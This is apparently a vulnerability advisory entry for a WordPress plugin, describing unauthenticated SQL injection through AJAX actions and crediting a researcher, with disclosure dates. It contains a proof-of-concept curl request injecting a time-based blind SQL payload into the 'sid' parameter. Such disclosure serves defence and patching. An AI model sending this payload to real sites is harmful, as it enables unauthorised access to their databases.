The plugin does not properly sanitise and escape numerous parameters before using them in SQL statements via some AJAX actions available to unauthenticated users, leading to unauthenticated SQL injections
curl 'https://example.com/wp-admin/admin-ajax.php' --data 'action=ocwma_choice_address&sid=3+AND+(SELECT+1946+FROM+(SELECT(SLEEP(5)))zsme)'
cydave
cydave
Yes
2022-04-11 (about 1 years ago)
2022-04-11 (about 1 years ago)
2022-04-13 (about 1 years ago)